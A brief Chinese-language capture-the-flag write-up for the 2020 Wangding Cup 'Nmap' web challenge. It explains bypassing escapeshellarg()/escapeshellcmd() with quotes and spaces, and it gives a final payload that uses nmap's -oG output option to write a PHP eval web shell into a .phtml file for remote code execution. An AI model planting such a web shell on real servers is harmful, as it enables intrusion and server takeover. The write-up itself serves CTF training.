[网鼎杯 2020 朱雀组]Nmap
看题目是一道关于nmap的题目
试试127.0.0.1
再来试试我本地kali的nmap
几乎是一样的 估计就只是放了个接口
nmap 命令可以将扫描结果保存在文件里面
就可以想到写一句话木马 这里屏蔽了php 并且 escapeshellarg()与escapeshellcmd()函数处理保护 与之前做的有道题目很相似
可以用空格与单引号绕过
选项:
最终payload:
1 | ' <?= @eval($_POST[1]);?> -oG a.phtml ' |
之后rce就行了